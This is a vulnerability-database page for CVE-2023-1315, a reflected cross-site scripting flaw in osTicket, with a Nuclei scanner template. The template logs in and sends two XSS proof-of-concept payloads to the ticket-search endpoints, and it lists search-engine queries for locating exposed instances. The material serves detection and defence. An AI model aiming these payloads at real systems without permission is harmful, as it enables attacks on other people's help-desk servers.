| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Reflected XSS in Advanced Ticket Search | 6 Dec 202218:10 | โ | huntr | |
| CVE-2023-1315 | 10 Mar 202318:21 | โ | circl | |
| Enhancesoft osTicket ่ทจ็ซ่ๆฌๆผๆด | 10 Mar 202300:00 | โ | cnnvd | |
| CVE-2023-1315 | 10 Mar 202300:00 | โ | cve | |
| CVE-2023-1315 Cross-site Scripting (XSS) - Reflected in osticket/osticket | 10 Mar 202300:00 | โ | cvelist | |
| CVE-2023-1315 | 10 Mar 202316:15 | โ | nvd | |
| CVE-2023-1315 Cross-site Scripting (XSS) - Reflected in osticket/osticket | 10 Mar 202300:00 | โ | osv | |
| Cross site scripting | 10 Mar 202316:15 | โ | prion | |
| CVE-2023-1315 | 23 May 202502:58 | โ | redhatcve | |
| CVE-2023-1315 Cross-site Scripting (XSS) - Reflected in osticket/osticket | 10 Mar 202300:00 | โ | vulnrichment |
id: CVE-2023-1315
info:
name: osTicket < v1.16.6 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://huntr.com/bounties/70a7fd8c-7e6f-4a43-9f8c-163b8967b16e
- https://nvd.nist.gov/vuln/detail/CVE-2023-1315
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-1315
cwe-id: CWE-79
epss-score: 0.10075
epss-percentile: 0.93216
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2023,osticket,xss,authenticated,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /{{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- scp/ajax.php/tickets/search?parent_id=1"><svg/x=">"/onload=confirm()//
- scp/ajax.php/tickets/search/create?pid=adhoc%2cpdXBTnfSg0riebm%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etgghb
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains_any(body, "><svg/x=\">\"/onload=confirm()//", "\"><script>alert(document.domain)</script>")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402207b4663cce1574f7752cf6454b5e7116927f6d4a42316f55bcff40db47f3633d40220671f40d7508996ee6b614cd9f4f5f74e0aedc5e81535304c45e79fba712ef820:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation